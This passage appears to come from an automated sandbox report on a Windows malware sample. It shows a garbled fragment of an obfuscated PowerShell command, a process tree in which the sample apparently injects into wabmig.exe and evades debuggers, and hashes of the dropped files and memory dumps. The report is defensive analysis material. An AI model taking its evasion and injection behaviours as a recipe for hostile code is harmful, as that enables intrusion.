sube.rrenLslas Fr ) cab ');firsaariges $Undervgtets;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2656
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Boko.Duc && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2652
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2116

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      849a26b301d08bb002ca216616892594

      SHA1

      dfdbb7c6a81a0ca92590f86deec70bbc0e049f40

      SHA256

      06ad06a478ba62cce70c21050198960234fd59e1f57b2a7068e60025ebe78eb0

      SHA512

      ccd8de4c291f108e0507b4b7ecda6f44cc8b157e4ea961f7b4d755eb997cd912bb3ade4edfe9f87fac617ed7d4bbdb310428717c8c510ecfe3c0742502d7f6c6

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CabB251.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar15B3.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Boko.Duc
      Filesize

      438KB

      MD5

      4ddea591d053049d64dfdd120458d2f7

      SHA1

      4e54f1b883e3f950b18fc74a86d64e37321b9f05

      SHA256

      e72b6eea450681f6c3bdcfdf39a76f6f3df333097b6f5c5674f47624698c8e1f

      SHA512

      734a40355738241be01b4ee84928eb9918826bad8ba0aaac52d2fc489a053eaefe54794561e372c98880f93b24e93ca80256d922d0a3ee244704c39895a391e2

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UOCT0WGFG7BRIDD8FGFR.temp
      Filesize

      7KB

      MD5

      642482ab7ad1487f65f8f0e476edb627

      SHA1

      fa9310c8e00048a18cc2b1f759410e5cfcf57180

      SHA256

      a22441fbac372d07dac4aa28f45a807823eb7a17b59a2b25780317ac9c67dfda

      SHA512

      8eecf88e8d7be3378a29498d3022ad07b978c4818db493329499967b7aab21d4117c1ffd1dae1cededa8e5947bb1ba461701792d3a33a1b9e5cd28435820db47

      Download Submit

    • memory/872-28-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/872-20-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/872-27-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/872-24-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/872-29-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/872-23-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/872-22-0x0000000002250000-0x0000000002258000-memory.dmp

      Filesize

      32KB

      Download

    • memory/872-59-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/872-25-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/872-21-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2116-35-0x00000000014C0000-0x000000000280E000-memory.dmp

      Filesize

      19.3MB

      Download

    • memory/2116-58-0x0000000000450000-0x00000000014B2000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/2116-60-0x0000000000450000-0x0000000000490000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2656-34-0x0000000006670000-0x00000000079BE000-memory.dmp

      Filesize

      19.3MB

      Download